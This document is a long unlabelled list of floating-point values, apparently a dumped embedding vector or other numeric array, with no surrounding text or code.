-0.009897303767502308, 0.02956295572221279, -0.06144710257649422, -0.03352832421660423, -0.04081428796052933, -0.03949249908328056, -0.01440267264842987, -0.026258481666445732, -0.03472115844488144, -0.005992382299154997, 0.012049241922795773, 0.003044549375772476, -0.008140290156006813, -0.0396859310567379, 0.029063254594802856, 0.04629487916827202, -0.018795205280184746, -0.019649533554911613, 0.054451290518045425, -0.0742136612534523, 0.006625068373978138, 0.00857551395893097, -0.014781477861106396, 0.0033689518459141254, -0.03256116062402725, -0.030820269137620926, -0.024952812120318413, -0.04813249036669731, 0.0048076072707772255, 0.04203936085104942, 0.009639393538236618, -0.009848945774137974, 0.030223850160837173, 0.017005953937768936, -0.010066557675600052, -0.01016327366232872, -0.003270220709964633, 0.009736109524965286, 0.008986558765172958, 0.024678781628608704, -0.008079842664301395, 0.0015404089353978634, 0.04078204929828644, -0.004324025474488735, 0.046004731208086014, 0.006911187432706356, -0.001996789127588272, -0.02081012912094593, -0.02014923468232155, 0.02166445553302765, -0.02111639641225338, 0.007281932979822159, -0.015232820995151997, -0.009663572534918785, 0.023759976029396057, 0.0011666406644508243, 0.020584456622600555, 0.00890596117824316, -0.01753789372742176, -0.025823257863521576, -0.0023292514961212873, -0.007664768490940332, 0.04474741965532303, -0.060512181371450424, 0.01960117556154728, -0.0231796782463789, -0.020890725776553154, 0.03222265467047691, 0.020133115351200104, -0.038912199437618256, -0.0031533550936728716, -0.02201908268034458, 0.0021015650127083063, 0.03975040838122368, -0.052452486008405685, 0.007152977865189314, 0.00987312477082014, -0.038396380841732025, 0.050969503819942474, -0.011025660671293736, -0.03565608337521553, -0.02256714180111885, 0.059931881725788116, -0.043876972049474716, -0.056482333689928055, -0.020826248452067375, 0.033915191888809204, -0.0044167120940983295, -0.0271128099411726, 0.001912162289954722, -0.04558562859892845, 0.03222265467047691, -0.0018839533440768719, -0.010743571445345879, 0.002417908050119877, -0.014773418195545673, 0.04258742183446884, 0.030094895511865616, -0.012484465725719929, 0.03958921507000923, 0.017924757674336433, 0.048906221985816956, 0.006141486577689648, -0.020165354013442993, 0.019165951758623123, 0.014604165218770504, 0.004182980861514807, -0.004299846477806568, 0.016651326790452003, -0.048970699310302734, 0.02132594957947731, -0.03868652880191803, -0.0014124612789601088, 0.007692977786064148, 0.01911759376525879, 0.03330265358090401, 0.01839222013950348, -0.03207758069038391, 0.01081610843539238, 0.017344459891319275, -0.028821464627981186, -0.006254322361201048, 0.0007525738910771906, -0.007805813103914261, 0.008970439434051514, -0.010074617341160774, -0.04474741965532303, -0.01805371418595314, -0.018553415313363075, -0.013927150517702103, -0.0042393989861011505, -0.024952812120318413, 0.03717130795121193, -0.004279697313904762, -0.005283128935843706, -0.004324025474488735, -0.03125549107789993, -0.015458492562174797, -0.0011102227726951241, 0.02993370220065117, -0.01281491294503212, -0.026274600997567177, 0.019375503063201904, 0.001339924056082964, -0.01031640823930502, 0.008212828077375889, 0.014700881205499172, -0.020713413134217262, -0.027499673888087273, 0.02856355346739292, 0.01528117898851633, 0.0036409664899110794, 0.03204534202814102, -0.006725814193487167, 0.02405012585222721, 0.029982060194015503, 0.025774899870157242, 0.0028611912857741117, -0.021035799756646156, -0.00245014694519341, -0.024501468986272812, -0.007495515048503876, 0.0063147698529064655, 0.041878167539834976, 0.029514597728848457, 0.026919376105070114, 0.020278189331293106, 0.015684163197875023, 0.014305955730378628, -0.009260588325560093, -0.04165249690413475, -0.001650222227908671, -0.008277305401861668, 0.002488430356606841, -0.00770103745162487, -0.004513428546488285, 0.00036067128530703485, 0.0047471593134105206, -0.011896107345819473, 0.011662377044558525, -0.02738683857023716, 0.01352416630834341, 0.0156035665422678, -0.0381707102060318, 0.018037594854831696, 0.012428047135472298, -0.00493656238541007, -0.033818475902080536, 0.005387905053794384, 0.03707459196448326, 0.02214803732931614, 0.028531314805150032, -0.06828172504901886, 0.01171073503792286, 0.017731325700879097, 0.02890206128358841, -0.038460858166217804, -0.03162623941898346, 0.02866027131676674, -0.0038263394962996244, -0.029047135263681412, -0.027306241914629936, -0.026129527017474174, 0.007064321544021368, -0.038879960775375366, -0.02735459990799427, -0.045972492545843124, 0.007999246008694172, -0.0003077795554418117, 0.00899461843073368, 0.02190624736249447, 0.0019212294137105346, -0.016232222318649292, 0.007962977513670921, 0.02508176676928997, 0.010122975334525108, 0.036397576332092285, -0.004146712366491556, -0.017005953937768936, 0.02669370546936989, -0.020584456622600555, 0.0035160414408892393, 0.014451030641794205, -0.019343264400959015, -0.005980292800813913, 0.004686711821705103, -0.00515820411965251, 0.002321191830560565, -0.008349842391908169, -0.012162077240645885, -0.023518186062574387, -0.025791019201278687, 0.039008915424346924, -0.028305644169449806, 0.012976107187569141, -0.025500871241092682, 0.03668772429227829, 0.0023070871829986572, 0.047939058393239975, -0.005061487667262554, -0.008208798244595528, 0.01678028143942356, 0.004207159858196974, 0.0013983568642288446, 0.00449730921536684, -0.0034737279638648033, 0.00990536343306303, -0.005561188794672489, 0.01977848820388317, 0.01914983242750168, 0.01826326549053192, 0.0013308569323271513, 0.015418194234371185, -0.012089540250599384, -0.009333125315606594, -0.004211189690977335, 0.0020582443103194237, 0.008704469539225101, 0.008269245736300945, -0.03913787379860878, -0.013701478950679302, 0.017586251720786095, -0.018198788166046143, 0.021938486024737358, -0.012581181712448597, -0.011726854369044304, 0.008454618975520134, -0.022970126941800117, -0.013225956819951534, -0.010630736127495766, -0.01628863997757435, -0.0025246990844607353, -0.020197592675685883, -0.014314016327261925, 0.00366514571942389, 0.005774770397692919, -0.02517848275601864, 0.009179990738630295, 0.019182071089744568, 0.005964173469692469, -0.02269609645009041, 0.017860280349850655, 0.002740295836701989, -0.002425967715680599, -0.017973117530345917, 0.011992824263870716, -0.015184463001787663, 0.0010658944956958294, 0.006177755072712898, 0.011622077785432339, -0.0006412493530660868, -0.007850141264498234, 0.018440578132867813, -0.0037880560848861933, -0.02965967170894146, -0.05406442657113075, -0.00040323653956875205, 0.010832227766513824, -0.022131917998194695, -0.041426826268434525, 0.03800951689481735, 0.014314016327261925, 0.025275198742747307, 0.0490674152970314, 0.005863427184522152, 0.021003561094403267, 0.0021761173848062754, 0.026854898780584335, -0.010026258416473866, 0.006512232590466738, 0.009018797427415848, 0.020665055140852928, -0.05864233151078224, 0.019504457712173462, -0.02211579866707325, 0.014982970431447029, 0.018214907497167587, -0.01757013238966465, -0.027757585048675537, -0.025791019201278687, -0.016909237951040268, -0.030820269137620926, 0.04929308593273163, 0.01705431193113327, -0.03549489006400108, -0.05206562206149101, 0.0218095313757658, 0.04477965831756592, -0.006604918744415045, -0.006963575258851051, -0.005956113804131746, 0.017666848376393318, 0.011976704932749271, -0.03984712436795235, 0.01531341765075922, -0.02845071814954281, 0.0031009670346975327, 0.027822062373161316, -0.002421937882900238, 0.021454904228448868, 0.01320983748883009, -0.039976079016923904, -0.024582065641880035, -0.0009490289376117289, 0.012790733948349953, 0.0047229803167283535, -0.015103865414857864, 0.051453083753585815, 0.020245950669050217, 0.0040459660813212395, -0.0018063788302242756, -0.02617788501083851, -0.049937862902879715, -0.002013915916904807, -0.007265813648700714, -0.01346774771809578, -0.02680654078722, -0.02583937719464302, -0.010413124226033688, 0.021245352923870087, 0.007471336051821709, -0.01369341928511858, -0.004618204664438963, 0.035946235060691833, 0.005492681171745062, 0.0019464159850031137, -0.026484152302145958, -0.003469698131084442, 0.009582975879311562, 0.0027423107530921698, -0.01726386323571205, -0.004759249277412891, -0.021616097539663315, 0.007898500189185143, -0.010638795793056488, -0.030610715970396996, 0.013806255534291267, -0.010082677006721497, 0.007112679537385702, -0.02056833729147911, -0.010284168645739555, 0.02263161912560463, -0.006887007970362902, 0.03617190569639206, 0.04606920853257179, -0.0022909678518772125, -0.03623638302087784, 0.006451784633100033, 0.003207758069038391, -0.02042326331138611, -0.0009832825744524598, -0.02835400216281414, 0.010122975334525108, -0.005694173742085695, -0.030820269137620926, 0.012250734493136406, -0.004920443054288626, -0.011057899333536625, -0.0007465291419066489, 0.021487142890691757, -0.01939162239432335, -0.011888047680258751, 0.014289836399257183, -0.014015806838870049, 0.013935210183262825, 0.0063993968069553375, 0.007257753983139992, -0.0012814912479370832, 0.003737682942301035, 0.007777604274451733, 0.009744169190526009, -0.025726541876792908, -0.03317369893193245, -0.02656475082039833, -0.03283519297838211, 0.0045456672087311745, 0.0032863400410860777, -0.007350440602749586, 0.0007490477873943746, -0.00161899090744555, 0.0069676050916314125, -0.012532823719084263, -0.03414086252450943, 0.027225645259022713, 0.00976834911853075, -0.020713413134217262, 0.0006256336928345263, 0.015821179375052452, -0.014354314655065536, 0.011291630566120148, 0.021003561094403267, 0.023953409865498543, 0.0013731702929362655, 0.01585341803729534, -0.010985362343490124, -0.008357902057468891, -0.006766112986952066, 0.011372228153049946, -0.0011424615513533354, -0.027757585048675537, 0.02762863039970398, 0.016474014148116112, 0.060060836374759674, 0.03141668438911438, -0.03227101266384125, -0.01802147552371025, -0.009429841302335262, 0.026306839659810066, -0.022502664476633072, 0.006604918744415045, -0.008309544064104557, 0.005029249005019665, 0.0013066778192296624, 0.007209395989775658, 0.0013056703610345721, 0.010018198750913143, -0.029675791040062904, 0.012137898243963718, -0.010098796337842941, 0.02832176350057125, 0.009502379223704338, 0.029337285086512566, -0.014386553317308426, -0.004436861258000135, 0.0010346631752327085, 0.02259938046336174, -0.04371577873826027, 0.004223279654979706, 0.01184774935245514, 0.002145893406122923, 0.011509242467582226, -0.031094297766685486, 0.021616097539663315, -0.04374801740050316, 0.002812833059579134, 0.020681174471974373, -0.009865065105259418, 0.035881757736206055, 0.0011948496103286743, -0.0010830212850123644, 0.012379689142107964, -0.011323869228363037, -0.002212385879829526, 0.041910406202077866, -0.021309830248355865, -0.014926552772521973, -0.020004158839583397, -0.0029135793447494507, 0.002397758886218071, -0.01687699928879738, -0.023518186062574387, 0.0015555209247395396, -0.011227153241634369, -0.03148116171360016, -0.053000546991825104, -0.0045698462054133415, -0.02101968042552471, -0.01881132461130619, -0.0039270855486392975, -0.0243886336684227, 0.00459805503487587, -0.004178951028734446, 0.0028974597807973623, 0.016973715275526047, 0.000568712130188942, 0.011742973700165749, 0.002649624366313219, 0.007007903419435024, -0.021503262221813202, -0.020278189331293106, 0.01905311644077301, -0.02014923468232155, 0.0055289496667683125, 0.007019992917776108, -0.04174921289086342, 0.004517458379268646, -0.01763460971415043, 0.003618802409619093, 0.018182668834924698, 0.03307698294520378, -0.00030803141999058425, 0.006822530645877123, -0.002837012056261301, 0.008889841847121716, -0.010259989649057388, -0.00044832046842202544, 0.020004158839583397, 0.0018023489974439144, 0.0028571614529937506, -0.004072159994393587, 0.03468891978263855, -0.017763564363121986, -0.023405350744724274, -0.014854015782475471, -0.0036490263883024454, -0.009333125315606594, -0.03684891760349274, -0.021954605355858803, -0.007890439592301846, -0.014297896064817905, 0.007193276658654213, 0.03917011246085167, 0.012049241922795773, -0.02480773627758026, 0.031191013753414154, -0.023195797577500343, 0.010219691321253777, -0.005057457834482193, 0.0024380572140216827, 0.026661466807127, 0.004650443326681852, 0.026677586138248444, 0.00857551395893097, -0.043941449373960495, -0.007898500189185143, 0.01653849147260189, 0.0131775988265872, -0.009840886108577251, -0.054483529180288315, -0.006689545698463917, -0.026677586138248444, -0.011090137995779514, -0.030965343117713928, 0.015152224339544773, 0.03630086034536362, -0.027709227055311203, -0.025339676067233086, 0.0005651860265061259, -0.007910589687526226, 0.00980058778077364, 0.011863868683576584, -0.010026258416473866, 0.025678183883428574, -0.002111639827489853, 0.006798351649194956, 0.0012502599274739623, -0.022035202011466026, 0.005625666119158268, -0.022276993840932846, -0.023985648527741432, 0.004948651883751154, -0.014475209638476372, -0.0012190286070108414, -0.0605766586959362, -0.011460884474217892, 0.01911759376525879, 0.05216233804821968, 0.00006073105032555759, -0.014765358529984951, -0.005214621778577566, -0.02662922814488411, -0.01963341422379017, 0.0013137300265952945, 0.0012835061643272638, -0.005669994279742241, -0.00916387140750885, -0.004594025202095509, 0.03501131013035774, 0.012444167397916317, 0.008470738306641579, 0.02101968042552471, 0.01414476241916418, 0.0045698462054133415, -0.007878350093960762, -0.034366533160209656, -0.014241478405892849, 0.008986558765172958, -0.023759976029396057, 0.011460884474217892, -0.006560590583831072, 0.04581129923462868, -0.001308692735619843, -0.020987441763281822, 0.004771338775753975, 0.02277669496834278, 0.01632894016802311, -0.02390505187213421, -0.03038504533469677, 0.017167147248983383, -0.02132594957947731, 0.02218027599155903, 0.002020968124270439, -0.032786834985017776, -0.0027282063383609056, 0.03093310445547104, 0.03014325350522995, 0.019069235771894455, -0.005057457834482193, 0.005549098830670118, -0.01258924137800932, -0.029031015932559967, -0.0034253697376698256, 0.022276993840932846, 0.0038021604996174574, -0.011315809562802315, 0.00009111232066061348, 0.020439382642507553, 0.00493656238541007, -0.006185814738273621, -0.013999687507748604, -0.02277669496834278, -0.022986246272921562, -0.02002027817070484, -0.019520577043294907, -0.015942074358463287, -0.029949821531772614, 0.017795803025364876, -0.02060057781636715, -0.0067902919836342335, 0.002917609177529812, 0.018988637253642082, 0.012234615162014961, 0.027016092091798782, -0.020229831337928772, -0.01660296879708767, 0.03430205583572388, 0.02807997167110443, -0.021132515743374825, -0.003383056493476033, -0.021616097539663315, -0.018795205280184746, -0.003213802818208933, -0.012315211817622185, 0.01258924137800932, 0.03717130795121193, -0.003413280239328742, 0.023856693878769875, -0.0016572745516896248, -0.03323817625641823, -0.010928944684565067, 0.007132828701287508, 0.0068144709803164005, -0.0025992512237280607, 0.028676390647888184, -0.03652653098106384, -0.008470738306641579, -0.008047604002058506, 0.0005591412191279233, 0.00663312803953886, 0.00828536506742239, -0.009188050404191017, 0.011412526480853558, 0.0018265281105414033, 0.016554610803723335, -0.04078204929828644, 0.032125938683748245, -0.012822972610592842, 0.004537607543170452, -0.03175519406795502, -0.02056833729147911, -0.026822660118341446, -0.034946832805871964, -0.031948626041412354, 0.025984453037381172, 0.00890596117824316, -0.01064685545861721, 0.0006739918608218431, 0.010638795793056488, 0.001378207583911717, -0.011049839667975903, -0.01932714506983757, -0.01781192235648632, -0.004481189418584108, 0.011186854913830757, 0.01660296879708767, 0.01753789372742176, -0.018940279260277748, -0.02914385125041008, 0.0020411175210028887, 0.02559758722782135, 0.031577881425619125, -0.025968333706259727, 0.014974910765886307, -0.023228036239743233, -0.0011646257480606437, 0.014878194779157639, 0.02593609318137169, 0.005835218355059624, -0.002959922421723604, 0.02463042363524437, 0.019730130210518837, 0.006197904236614704, 0.0047834282740950584, -0.0012119763996452093, 0.03607518970966339, -0.0014225359773263335, -0.02163221687078476, 0.02053609862923622, -0.017199385911226273, -0.012178197503089905, -0.001688505755737424, 0.03926682844758034, 0.01026804931461811, -0.022937888279557228, -0.02139042690396309, -0.022470425814390182, 0.016482073813676834, 0.012162077240645885, 0.01726386323571205, 0.028676390647888184, -0.010791929438710213, 0.022309232503175735, -0.007813872769474983, 0.06370382010936737, -0.006310740020126104, -0.019311025738716125, 0.017682967707514763, -0.007269843481481075, -0.0018748862203210592, 0.017425058409571648, -0.01815043017268181, -0.011839689686894417, -0.027193406596779823, 0.011436705477535725, -0.02838624082505703, -0.014934612438082695, -0.011944466270506382, 0.004311935976147652, 0.01732834056019783, -0.006157605908811092, 0.006653277203440666, 0.021922366693615913, -0.005379845388233662, -0.0034676832146942616, -0.019488338381052017, 0.019472219049930573, -0.032093700021505356, 0.015273119322955608, -0.01660296879708767, -0.003713503945618868, -0.0020652965176850557, -0.00175902817863971, -0.02356654405593872, 0.0027483555022627115, 0.02532355673611164, -0.04368354007601738, 0.004585965536534786, 0.017312221229076385, -0.03072355128824711, 0.008406260050833225, -0.01646595448255539, -0.0008684319909662008, -0.020648935809731483, 0.005649845115840435, -0.015788940712809563, -0.018972517922520638, 0.01019551232457161, 0.032673999667167664, 0.08794737607240677, 0.010372825898230076, 0.010953123681247234, -0.03459220379590988, -0.015394015237689018, 0.0010729467030614614, -0.00559745728969574, 0.011662377044558525, 0.0008004283299669623, 0.013572524301707745, 0.03617190569639206, -0.006907157599925995, -0.008220887742936611, -0.004662532825022936, -0.00666536670178175, 0.013048644177615643, -0.013000286184251308, -0.00857551395893097, -0.007503574714064598, 0.0032682057935744524, 0.0024098483845591545, -0.0036167874932289124, 0.019955800846219063, -0.01358864363282919, 0.006681486032903194, -0.011718794703483582, -0.005802979227155447, -0.024340273812413216, -0.03562384471297264, -0.013338793069124222, 0.0068144709803164005, -0.010445362888276577, -0.0105259595438838, 0.0036671606358140707, 0.010050438344478607, 0.005811038892716169, 0.01990744285285473, -0.015579387545585632, 0.003912981133908033, -0.008881782181560993, 0.0027866391465067863, 0.0001429336261935532, -0.01064685545861721, 0.019988039508461952, 0.014322075992822647, -0.004134622868150473, 0.04220055416226387, -0.012685957364737988, -0.008696409873664379, -0.0061374567449092865, -0.014531627297401428, -0.023856693878769875, 0.022583261132240295, 0.009308946318924427, 0.004767308942973614, 0.025710422545671463, 0.00016497184697072953, 0.00046318050590343773, -0.02580713853240013, -0.01774744503200054, -0.014185060746967793, -0.0025005198549479246, -0.001301640528254211, 0.009244468994438648, 0.006403426639735699, -0.016216102987527847, -0.003084847703576088, 0.0213581882417202, -0.011912227608263493, 0.017795803025364876, 0.03578503802418709, -0.006584769580513239, -0.00980058778077364, -0.000820073822978884, 0.0009963796474039555, 0.02780594304203987, -0.002603281056508422, 0.016079088672995567, -0.02962743304669857, -0.023131320253014565, 0.009945661760866642, 0.03199698403477669, 0.009808647446334362, 0.013371031731367111, -0.005770740564912558, 0.03807399421930313, -0.004138652700930834, -0.0014537671813741326, 0.0013953344896435738, -0.005351636558771133, -0.013362972065806389, 0.0032399967312812805, 0.013193718157708645, 0.03011101484298706, -0.012000883929431438, 0.01798923686146736, 0.015716401860117912, -0.013508046045899391, -0.023969529196619987, -0.006806411314755678, 0.014289836399257183, -0.0042152199894189835, 0.017279982566833496, 0.0037779812701046467, -0.01269401703029871, -0.011807451024651527, 0.005500740837305784, 0.010066557675600052, -0.00019318077829666436, -0.01850505731999874, -0.02218027599155903, -0.02132594957947731, -0.0011354093439877033, -0.037332501262426376, -0.004912383388727903, 0.007761484943330288, 0.007422977592796087, 0.008922080509364605, -0.016909237951040268, -0.012387748807668686, -0.02081012912094593, 0.0058996956795454025, 0.027725346386432648, -0.005129994824528694, 0.0024481320288032293, -0.020519979298114777, 0.0026012661401182413, -0.0035905935801565647, 0.03020773082971573, 0.014991030097007751, 0.012822972610592842, 0.0077292462810873985, 0.0047229803167283535, -0.01708655059337616, 0.005883576348423958, -0.026951614767313004, 0.025581467896699905, 0.0057223825715482235, -0.012669838033616543, 0.0047229803167283535, 0.002816862892359495, 0.027338480576872826, 0.029272807762026787, 0.014104464091360569, -0.004102384205907583, -0.01440267264842987, 0.013741777278482914, 0.005355666391551495, 0.00843849964439869, 0.00967969186604023, -0.0031191015150398016, -0.01884356327354908, 0.015869537368416786, 0.032883550971746445, 0.008623871952295303, 0.011307749897241592, 0.01874684728682041, -0.02269609645009041, -0.009171931073069572, 0.014966851100325584, 0.0053758155554533005, 0.024968931451439857, 0.03552712872624397, -0.02060057781636715, -0.005714322905987501, 0.02638743631541729, -0.014168941415846348, -0.049873385578393936, -0.016941476613283157, -0.009051036089658737, -0.017924757674336433, 0.002016938291490078, -0.00016686084563843906, 0.0015756700886413455, 0.024985050782561302, 0.01811819151043892, -0.011017601005733013, -0.004227309487760067, 0.028885941952466965, -0.027016092091798782, -0.005275069270282984, 0.023437589406967163, -0.019714010879397392, 0.008946259506046772, 0.027757585048675537, -0.0022043262142688036, -0.003207758069038391, 0.02139042690396309, -0.03955697640776634, 0.027548031881451607, 0.014322075992822647, 0.023228036239743233, -0.026500273495912552, -0.0070280530489981174, -0.016667446121573448, -0.021728934720158577, 0.011436705477535725, 0.0004231339262332767, -0.016893118619918823, 0.024001767858862877, -0.015047447755932808, -0.0034475340507924557, -0.020455501973628998, 0.005645815283060074, -0.005645815283060074, -0.03720354661345482, 0.004622234497219324, 0.0016945506213232875, -0.00993760209530592, -0.004573876038193703, -0.022760575637221336, 0.02369549870491028, 0.02529131807386875, -0.003070743288844824, 0.004380443599075079, -0.0006100180326029658, 0.02056833729147911, -0.02566206455230713, -0.009204169735312462, 0.016554610803723335, -0.0298369862139225, 0.019971920177340508, 0.009663572534918785, -0.0011525361333042383, -0.01395132951438427, -0.0009278721990995109, 0.04010503366589546, -0.03227101266384125, 0.008382081054151058, 0.009139692410826683, -0.009260588325560093, 0.002893429948017001, 0.01563580520451069, -0.001103170565329492, -0.00419507035985589, -0.0033105190377682447, 0.0014598120469599962, 0.002693952526897192, -0.01093700435012579, -0.023405350744724274, 0.014168941415846348, -0.00006687027052976191, -0.0319647453725338, -0.009744169190526009, -0.012428047135472298, -0.00011566919420147315, -0.002516639418900013, 0.0035241011064499617, -0.0018557443981990218, 0.04329667240381241, -0.022454306483268738, 0.006596859078854322, 0.006971634924411774, -0.00314731034450233, -0.0046141743659973145, 0.016764162108302116, 0.028515195474028587, -0.0006991784321144223, 0.0035865637473762035, 0.004424771759659052, -0.007697007618844509, -0.008849543519318104, -0.011726854369044304, 0.0271128099411726, -0.016699684783816338, 0.029514597728848457, -0.010654915124177933, -0.0006986747030168772, 0.006383277475833893, 0.00806372333317995, 0.02380833402276039, -0.010791929438710213, 0.018198788166046143, 0.004319995641708374, -0.02662922814488411, 0.011952525936067104, 0.00147290900349617, -0.019165951758623123, 0.0008069768082350492, -0.009889244101941586, -0.005420144181698561, 0.06380053609609604, 0.004376413766294718, -0.012653718702495098, 0.006274471525102854, -0.014805656857788563, -0.02869250997900963, -0.003622832242399454, -0.011033720336854458, -0.009518498554825783, 0.00007990430458448827, 0.009607154875993729, -0.01391909085214138, -0.014064165763556957, 0.02787042036652565, 0.002885370282456279, -0.026500273495912552, 0.036462053656578064, -0.02235759049654007, 0.02263161912560463, 0.010953123681247234, -0.005730442237108946, 0.017586251720786095, 0.013572524301707745, -0.004052010830491781, 0.0019282817374914885, -0.0037880560848861933, -0.005782830063253641, -0.005472532007843256, -0.004682681988924742, 0.0030102955643087626, -0.02553310990333557, -0.005927904509007931, -0.022647738456726074, 0.004027831833809614, 0.008688349276781082, 0.009744169190526009, 0.00566596444696188, -0.01457192562520504, 0.005444323178380728, 0.021503262221813202, -0.020665055140852928, -0.05129189044237137, -0.03127161040902138, 0.001580707379616797, 0.017038192600011826, -0.005714322905987501, 0.0001724018802633509, -0.005013129208236933, -0.02787042036652565, 0.029401762410998344, 0.010002079419791698, 0.03626862168312073, 0.013064763508737087, 0.00224865460768342, -0.013564464636147022, -0.001825520652346313, -0.001713692327030003, 0.0037195486947894096, -0.0038263394962996244, -0.019617294892668724, 0.027435196563601494, -0.01595013402402401, 0.003800145583227277, 0.03407638520002365, 0.02005251683294773, 0.014015806838870049, -0.00248440052382648, 0.002188206883147359, -0.028885941952466965, -0.027064451947808266, -0.016095208004117012, -0.012137898243963718, 0.02032654732465744, -0.002613355638459325, 0.011033720336854458, 0.006463874131441116, -0.0040117125026881695, 0.009276707656681538, -0.014152822084724903, -0.019456099718809128, 0.00692327693104744, 0.0004578913503792137, -0.006612978409975767, 0.013983568176627159, 0.010945064015686512, -0.01193640660494566, 0.009486258961260319, 0.010050438344478607, -0.028031613677740097, -0.017279982566833496, 0.010002079419791698, -0.0013550360454246402, 0.02011699602007866, 0.0035805189982056618, 0.0026153705548495054, 0.019198190420866013, -0.004912383388727903, -0.01750565506517887, 0.01935938373208046, 0.0005415106425061822, -0.002663728781044483, -0.0018718638457357883, 0.013322673738002777, -0.026709824800491333, 0.011654317378997803, -0.012307152152061462, 0.0024622364435344934, -0.0006679471116513014, -0.011670436710119247, 0.00449730921536684, 0.02429191581904888, 0.010308348573744297, 0.05038920417428017, 0.01615162566304207, 0.008152379654347897, 0.006689545698463917, 0.0006679471116513014, -0.02817668952047825, 0.014854015782475471, 0.02632295899093151, 0.013097002170979977, 0.0013217898085713387, 0.01557132788002491, 0.004908353555947542, -0.0015031328657642007, 0.02201908268034458, -0.023437589406967163, 0.04532771557569504, -0.0035442502703517675, 0.013604762963950634, -0.004440891090780497, 0.012685957364737988, -0.007269843481481075, -0.01684475876390934, -0.003445519134402275, -0.005649845115840435, -0.006334919016808271, -0.010550138540565968, 0.013774015940725803, 0.01495073176920414, 0.017070431262254715, -0.021180875599384308, -0.02959519438445568, 0.004972830880433321, -0.007068351376801729, 0.017425058409571648, -0.006653277203440666, 0.0006760067772120237, 0.016232222318649292, 0.006697605364024639, 0.013548345305025578, 0.02218027599155903, 0.011323869228363037, 0.001354028470814228, -0.00666536670178175, -0.001413468737155199, 0.007692977786064148, 0.009502379223704338, -0.006919247098267078, 0.0028309673070907593, -0.003032459644600749, -0.022276993840932846, 0.011283570900559425, -0.007672828156501055, -0.011017601005733013, 0.006911187432706356, -0.007015963084995747, -0.0051985024474561214, 0.0009117528679780662, 0.017860280349850655, -0.003379026660695672, -0.0026012661401182413, 0.0017539907712489367, 0.005617606453597546, -0.0035865637473762035, -0.00563372578471899, 0.0026395495515316725, 0.004533577710390091, 0.00993760209530592, 0.012323271483182907, -0.007032082881778479, 0.016586849465966225, -0.0035079815424978733, 0.008889841847121716, 0.018343862146139145, 0.01214595790952444, -0.00954267755150795, 0.003074773121625185, -0.029031015932559967, 0.026403555646538734, -0.011976704932749271, 0.006818500813096762, -0.004207159858196974, -0.004650443326681852, 0.004251488484442234, -0.024195199832320213, -0.026065049692988396, 0.005492681171745062, 0.0005596449482254684, -0.010300288908183575, 0.019504457712173462, -0.012017003260552883, -0.005150144454091787, -0.005230741109699011, 0.0004226301971357316, -0.0003130687109660357, 0.011984764598309994, 0.010493720881640911, 0.023679379373788834, 0.0012482450110837817, -0.0005732456920668483, -0.008261186070740223, 0.00036344179534353316, 0.018956398591399193, 0.021857889369130135, 0.005182383116334677, 0.013491926714777946, 0.0190853551030159, -0.010985362343490124, -0.00010465008381288499, -0.0218095313757658, 0.027854301035404205, 0.0018295504851266742, 0.00824909657239914, -0.02187400870025158, -0.007749395444989204, 0.002299027517437935, 0.012307152152061462, -0.025984453037381172, -0.0040701450780034065, -0.01660296879708767, -0.011597898788750172, 0.011565660126507282, -0.00047829243703745306, 0.0020854456815868616, 0.0014235434355214238, -0.012428047135472298, -0.021825650706887245, -0.005234770942479372, 0.011412526480853558, 0.0021237293258309364, 0.0027423107530921698, -0.015418194234371185, 0.0065283519215881824, 0.005150144454091787, 0.006201934069395065, 0.012017003260552883, -0.006310740020126104, -0.020761771127581596, -0.0012653719168156385, -0.0011404466349631548, -0.01116267591714859, -0.002254699356853962, -0.00710461987182498, -0.010284168645739555, 0.018005356192588806, -0.012484465725719929, -0.008728648535907269, -0.01372565794736147, 0.006830590311437845, 0.010824168100953102, 0.004203130025416613, 0.015385955572128296, -0.0034777577966451645, -0.030642954632639885, -0.0052629797719419, -0.012500585056841373, -0.029240569099783897, 0.016361178830266, -0.0006488053477369249, 0.005839248187839985, -0.013088942505419254, -0.014314016327261925, -0.0033346982672810555, 0.010098796337842941, -0.003300444455817342, -0.006798351649194956, -0.0015676104230806231, 0.01663520745933056, 0.017167147248983383, -0.011477003805339336, 0.021712815389037132, 0.028740867972373962, 0.027854301035404205, 0.007902530021965504, 0.0010427228407934308, 0.017457297071814537, 0.003366936929523945, -0.023340873420238495, -0.0015817148378118873, 0.015128045342862606, -0.0061616357415914536, 0.013024465180933475, -0.006911187432706356, 0.010695213451981544, -0.007152977865189314, -0.011831630021333694, 0.006524322088807821, -0.004436861258000135, 0.0186340119689703, 0.010832227766513824, -0.02435639500617981, -0.010171333327889442, 0.0021076099947094917, -0.02469490095973015, 0.0186340119689703, -0.017586251720786095, -0.02405012585222721, -0.013935210183262825, 0.003939175046980381, 0.019214309751987457, -0.02390505187213421, -0.0065887994132936, -0.005811038892716169, 0.006322829518467188, -0.02314743958413601, 0.005492681171745062, -0.0036308919079601765, 0.004364324267953634, -0.006794321816414595, -0.0020673114340752363, -0.008962378837168217, -0.0026093258056789637, -0.009824766777455807, -0.003981488756835461, 0.03222265467047691, -0.005585367791354656, -0.02405012585222721, -0.018859682604670525, -0.002002833876758814, -0.016393417492508888, 0.007189246825873852, 0.001001920667476952, -0.0007707081967964768, -0.0026395495515316725, -0.009550737217068672, -0.01420923974364996, -0.013113121502101421, -0.030916985124349594, 0.0236310213804245, 0.007455216720700264, 0.0011323869694024324, -0.0003944212512578815, 0.022099679335951805, -0.004718950483947992, -0.0015414163935929537, -0.021003561094403267, 0.008325663395226002, -0.007019992917776108, 0.01805371418595314, 0.020342666655778885, 0.01926266774535179, 0.03298026695847511, -0.0006326859584078193, 0.010139094665646553, -0.0033286535181105137, -0.006568650249391794, 0.010727452114224434, 0.004622234497219324, -0.0022768634371459484, -0.003578504081815481, 0.015023268759250641, 0.008341782726347446, -0.011178795248270035, 0.00412454828619957, -0.004084249958395958, -0.007862230762839317, 0.01602267101407051, 0.010743571445345879, 0.010832227766513824, 0.009663572534918785, -0.007572082336992025, 0.021986844018101692, 0.022679977118968964, -0.028724748641252518, -0.012411927804350853, -0.009470139630138874, -0.004404622595757246, -0.00009703115210868418, 0.018521176651120186, 0.008656110614538193, -0.023066842928528786, 0.007741335779428482, 0.005496711004525423, -0.007809842936694622, 0.01649819314479828, 0.017441177740693092, 0.021519381552934647, 0.01657073013484478, 0.003280295291915536, -0.004267607815563679, -0.010654915124177933, -0.003912981133908033, -0.004142682533711195, -0.008208798244595528, 0.0059601436369121075, -0.005279099103063345, -0.017408939078450203, 0.008889841847121716, 0.005142084322869778, -0.0030626836232841015, -0.007410888094455004, 0.0019141772063449025, -0.011098197661340237, -0.024823855608701706, -0.008559394627809525, -0.016038790345191956, 0.004751189611852169, -0.007298052776604891, 